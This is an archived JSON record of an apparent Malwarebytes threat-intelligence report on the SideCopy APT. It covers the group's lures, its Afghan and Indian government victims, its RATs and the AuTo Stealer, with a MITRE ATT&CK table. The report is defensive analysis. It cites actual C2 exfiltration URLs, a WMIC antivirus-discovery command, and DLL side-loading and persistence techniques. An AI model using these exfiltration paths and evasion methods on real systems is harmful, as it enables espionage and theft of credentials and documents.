{
	"id": "7e52f5b9-fcdc-4934-81fe-470f9aa69626",
	"created_at": "2026-04-06T00:08:04.037073Z",
	"updated_at": "2026-04-10T03:36:50.231088Z",
	"deleted_at": null,
	"sha1_hash": "0b1764f058dae3ad01b60b4d305caecafe09f8e5",
	"title": "SideCopy APT: Connecting lures to victims, payloads to infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7368498,
	"plain_text": "SideCopy APT: Connecting lures to victims, payloads to infrastructure\r\nPublished: 2021-12-02 · Archived: 2026-04-02 11:15:53 UTC\r\nThis blog post was authored by Hossein Jazi and the Threat Intelligence Team.\r\nLast week, Facebook announced that back in August it had taken action against a Pakistani APT group known as SideCopy. Facebook describes how the threat actors used romantic lures to compromise targets in Afghanistan.\r\nIn this blog post we are providing additional details about SideCopy that have not been published before. We were able to have unique insights about victims and targeted countries as well as the kind of data the APT group was able to successfully exfiltrate. Among the information that was stolen is access to government portals, Facebook, Twitter and Google credentials, banking information, and password-protected documents.\r\nIn addition, we detail how this threat actor had started to use new initial infection vectors for its operations which include Microsoft Publisher documents and Trojanized applications. Finally, we detail a newly-observed stealer that has been used by this actor called AuTo stealer.\r\nNewly observed lures\r\nThe SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.\r\nThe lures used by SideCopy APT are usually archive files that have embedded one of these files: Lnk, Microsoft Publisher or Trojanized Applications. 
These lures can be categorized into two main groups:\r\nTargeted lures: These lures are specially crafted and designed to target specific victims. We believe this category is very well customized to target government or military officials. Here are some examples:\r\nReport-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip: This archive file contains a Microsoft Publisher document that is a letter from “Mr Ahmad Shuja Jamal, former DG for International Relations and Regional Cooperation at the National Security Council of Afghanistan” to “Hamdullah Mohib, former National Security Adviser of Afghanistan”. This letter is about a “meeting with representatives of France and UK delegations of Afghanistan”. Most likely this lure has been used to target Afghanistan government officials and especially foreign affairs related officials.\r\naddress-list-ere-update-sep-2021.zip: This archive file contains a malicious lnk file which loads a decoy PDF file. The decoy PDF file is: “Email facility address list of the ERE units: 20 Sept 2021”. This lure seems to be used to target the Indian Army and National Cadet Corps of India.\r\nNCERT-NCF-LTV-Vislzr-2022.zip: Similar to the previous one, this includes a malicious lnk that loads a decoy PDF file. The decoy is a curriculum of the course named “Living the values, a value-narrative to grass-root leadership” offered by NCERT (National Council of Educational Research and Training of India).\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/\r\nPage 1 of 18\r\nGeneric lures: These lures are mostly generic and most likely have been used in spam campaigns to collect emails and credentials to help the actor perform their targeted attacks. In this category we observed the following (the first three lures are the ones reported as “romantic lures” in the Facebook report):\r\nUsing girl names as the archive file name such as “nisha.zip” (showing girl pictures with an application): These archive files contain a list of images with the “.3d” extension and an application named “3Dviewer.exe” that needs to be executed to load and view the images. In fact, the executable is Trojanized and will contact the actor’s servers to download the malicious payloads.\r\n“image-random number.zip”: These zip files contain a malicious lnk file that shows a girl picture as a decoy.\r\n“Whatsapp-image-random number.zip”: These zip files contain a malicious lnk file that shows a girl picture as a decoy.\r\n“schengen_visa_application_form_english.zip”: This archive file contains a Microsoft Publisher document that loads a Schengen Visa Application Form in English as a decoy. This is used to target people who want to travel to European countries.\r\n“Download-Maria-Gul-CV.zip”: This archive contains a lnk that loads a resume as a decoy. The name of the archive file usually follows the pattern “Download-Name-FamilyName-CV.zip”.\r\n“New document.zip”: This loads a document as a decoy. We were not able to retrieve the lure in this case.\r\nVictimology\r\nAs previously reported, the SideCopy APT has mainly targeted defense and armed forces personnel in the Indian subcontinent, but there are not many reports about how successful these attacks were and what data was exfiltrated. The Malwarebytes Threat Intelligence team was able to identify some of the successful attacks operated by this APT. It is worth noting that those compromises happened before the Taliban completely took over Afghanistan. In fact, Facebook’s intervention in August matches the timeline of indicators we recorded.\r\nAdministration Office of the President (AOP) of Afghanistan personnel: This actor has operated targeted spear phishing attacks on members of the AOP and was able to gain access to ten of them and steal their credentials for different government services such as mis.aop.gov.af, internal services, bank services (Maiwand Bank) and personal accounts such as Google, Twitter and Facebook.\r\nMinistry of Foreign Affairs, Afghanistan: We have evidence that the actor infected one of the members of the Ministry of External Affairs, but it seems they were not able to collect any data from this victim.\r\nMinistry of Finance, Afghanistan: The actor infected two members of the MOF but mostly they were able to collect personal accounts such as Google and Facebook and bank accounts (“worldbankgroup.csod.com”). They also exfiltrated documents that are password protected.\r\nAfghanistan’s National Procurement Authority (NPA): The actor infected one person in the NPA and was able to steal personal credentials including Twitter, Facebook, Instagram, Pinterest, Google and the mis.aop.gov.af account.\r\nA shared computer, India: It seems the actor gained access to a shared machine and collected a lot of credentials from government and education services. It seems this machine has been infected using one of the generic lures.\r\nThe SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of the Government of Afghanistan. They were also able to exfiltrate the ID cards of several Afghan government officials.\r\nThe exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have already been targeted by the actor or will be future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures.\r\nAttacker infrastructure\r\nWe have uncovered the main command and control (C2) server used by the attacker to monitor and control their victims. Each archive file that the attacker sends to victims is considered a unique package, and each package has its own payloads, including hta files and executables that are usually hosted on compromised domains. The actor has a system named “Scout” to monitor each package. The Scout system has four users with English nicknames (Hendrick, Alexander, Hookes, Malone). It also defines teams that are responsible for managing each package.\r\nIn this system, they have a dashboard that shows all the infected machines. Each row in the dashboard shows one package and its statistics, which include the IP address of the victim, package name, OS version, User-Agent, browser information, country and victim status.\r\nThe actor uses a different dashboard called Crusader to monitor the Action RAT statistics.\r\nAnalysis of the new attacks\r\nAs we mentioned earlier, the actor has used three different methods as its initial infection vector: lnk files, Microsoft Publisher files and Trojanized applications. The lnk files have been well studied and what we have observed is very similar to what has already been reported, with only small changes. For example, we observed that they have updated the code of hta.dll and preBotHta.dll and added some more features.\r\nIn this section we provide the analysis for the other two variants: Microsoft Publisher and Trojanized Applications.\r\nMicrosoft Office Publisher\r\nIn this variant, attackers have embedded a Microsoft Office Publisher document in an archive file. We’ve identified two variants of the Office Publisher documents:\r\nReport to NSA Mohib – Meeting with FR, GE, UK – 12 Nov 2020.docx.pub\r\nschengen_visa_application_form_english.pub\r\nBoth of these documents were created in August 2021 and we believe they have been used in the most recent campaign. Both of these documents contain a simple macro that calls the Shell function to run mshta.exe, which downloads and executes a specified hta file.\r\nThe hta file loads the loader DLL (PreBotHta.dll) into memory and then collects AV product names. The AV name along with the encoded payloads that need to be loaded by this loader are passed to the PinkAgain function.\r\nThe loader is responsible for dropping both credwiz.exe and Duser.dll. Unlike what has been reported, in this case Duser.dll is not copied into different locations based on AV products; it is copied into C:\\ProgramData\\ShareIt for all AV products.\r\nThis loader just does some additional work based on the AV product. For example, if the AV product is Avira it tries to download and execute an additional hta file to deploy additional payloads.\r\nAfter dropping the required files onto the victim, it starts the “credwiz.exe” process. This executable sideloads the malicious payload “Duser.dll”. This payload has been written in Delphi (this is the Delphi variant of Action RAT) and was compiled on October 2 2021.\r\nAll the commands, strings and domains in this RAT are base64 encoded. The malicious process starts by collecting the hostname, username, OS version, OS architecture, MAC address and installed AV products (by executing cmd.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List) from the victim and sending them to the command and control server using an HTTP request (\"https://afrepublic.xyz/classification/classification.php\").\r\nIt then goes into a loop and waits for commands from the server to execute. This RAT has the capability to execute one of the following commands:\r\nCommand: Execute commands received from the server\r\nDownload: Download additional payloads\r\nDrives: Get drive info\r\nGetFiles: Get files info\r\nExecute: Execute a specified payload using CreateProcessW\r\nUpload: Upload files to server\r\nAfter execution of each command it reports the result back to its server. The reporting URL is different from the C2 URL. The report type depends on the command; for example, if the payload executes a command, it reports the following information to the server: the victim’s ID, the executed command, the command output and the error message if the command execution was not successful.\r\nTrojanized Image Viewer Application (3DViewer.exe)\r\nIn this variant, the attacker has distributed an archive file including an application named 3Dviewer.exe and a set of images with the “3d” extension that can only be opened by that executable.\r\nIt seems the attacker Trojanized an image viewer application named “3Dviewer” to download and execute a malicious HTA file using Mshta in addition to its normal function of loading and showing the pictures. This executable was compiled on October 26 2021. The rest of the process is similar to what we described in the previous section.\r\nAuTo Stealer\r\nWe also came across another Stealer used by this actor that has been written in C++. To the best of our knowledge this is a new Stealer used by SideCopy APT. A Loader has been used to drop and load an executable (credbiz.exe) that side loads the Stealer. We were able to identify two different variants of this Loader that have been used to load an HTTP version and a TCP version of the Stealer. Both of these loaders and the Stealer components were compiled on October 30 2021.\r\nLoader\r\nBased on the functionality, we can say this Loader is a C++ variant of PreBotHta.dll (the C# Loader used to load other RATs used by this actor). This Loader is responsible for dropping the following files in the C:\\ProgramData\\Oracle directory:\r\ncredwiz.exe executable, renamed as credbiz.exe\r\nTextShaping.dll (Stealer component that will be side loaded by credbiz.exe)\r\nSimilar to PreBotHta.dll, it checks the installed AV product on the victim’s machine and performs additional actions based on the AV product name. For example, if the AV is Avast, Avira, BitDefender or AVG it creates a batch file (sysboot.bat) and executes it by calling cmd.exe. This makes credbiz.exe persistent through the AutoRun registry key. If the installed AV is one of Kaspersky, Symantec, McAfee or QuickHeal, it creates an lnk file (Win Setting Loader.lnk) for persistence in the StartUp directory.\r\nAfter performing the additional process, it executes credbiz.exe by calling CreateProcessW.\r\nTextShaping.dll (Stealer component)\r\nThe actor used two different variants of the Stealer: HTTP and TCP. The HTTP version performs the exfiltration over HTTP while the TCP variant performs all the exfiltration over TCP. This component also has an interesting unique PDB path: \"D:\\Project Alpha\\HTTP Auto\\app\\Release\\app.pdb\"\r\nThis Stealer collects PowerPoint, Word, Excel and PDF documents, text files, database files and images and exfiltrates them to its server over HTTP or TCP. To exfiltrate the data using HTTP, it builds a request that is specific to the type of data file being exfiltrated and sends it to an HTTP server. For example, when it wants to exfiltrate PowerPoint documents it builds the following request and sends it over HTTP:\r\nhttp://newsroom247.xyz:8080/streamppt?HostName_UserName\r\nFor other file types it adds the /stream path related to the file type and exfiltrates them to the server. Here is the list of them: /streamppt, /streamdoc, /streamxls, /streamdb, /streamtxt, /streampdf, /streamimg.\r\nBefore starting the stealing process, it collects the victim’s information including username, hostname, OS info and AV products and sends them to its server by adding “user_details” to the domain. Also, it collects file information from the victim’s machine and stores it in a file “Hostname_UserName.txt” and sends the file by using the “logs_receiver” command.\r\nConclusion\r\nThe SideCopy APT has been actively targeting government and military officials in South Asia. The group mainly uses archived files to target victims in spam or spear phishing campaigns. The archive files usually have an embedded lnk, Office or Trojanized application that are used to call mshta to download and execute an hta file. The hta files perform fileless payload execution to deploy one of the RATs associated with this actor such as AllaKore or Action RAT. Malwarebytes products can identify the initial infection vectors used by SideCopy and block them from execution.\r\nMITRE ATT&CK techniques\r\nTactic | ID | Name | Details\r\nPhishing | T1566.001 | Spear phishing Attachment | Distribute archive file as a spear phishing attachment\r\nExecution | T1047 | Windows Management Instrumentation | Uses WMIC.EXE to obtain system information; uses WMIC.EXE to obtain a list of antiviruses\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Starts CMD.EXE for command execution\r\nExecution | T1204.001 | User Execution: Malicious Link |\r\nExecution | T1204.002 | User Execution: Malicious File |\r\nPersistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |\r\nDiscovery | T1012 | Query Registry | Reads the computer name\r\nDiscovery | T1082 | System Information Discovery |\r\nDiscovery | T1518.001 | Software Discovery: Security Software Discovery | Uses WMIC.EXE to obtain a list of antiviruses\r\nDefense Evasion | T1218.005 | Signed Binary Proxy Execution: Mshta | Starts MSHTA.EXE for opening HTA or HTML files\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | Uses base64 decoding to decode C2s\r\nDefense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses credwiz.exe to side load its malicious payloads\r\nCollection | T1119 | Automated Collection | Collects db files, docs and pdfs automatically\r\nCollection | T1005 | Data from Local System |\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols |\r\nCommand and Control | T1071.002 | Application Layer Protocol: File Transfer Protocols |\r\nExfiltration | T1041 | Exfiltration Over C2 Channel |\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/"
	],
	"report_names": [
		"sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434084,
	"ts_updated_at": 1775792210,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0b1764f058dae3ad01b60b4d305caecafe09f8e5.pdf",
		"text": "https://archive.orkl.eu/0b1764f058dae3ad01b60b4d305caecafe09f8e5.txt",
		"img": "https://archive.orkl.eu/0b1764f058dae3ad01b60b4d305caecafe09f8e5.jpg"
	}
}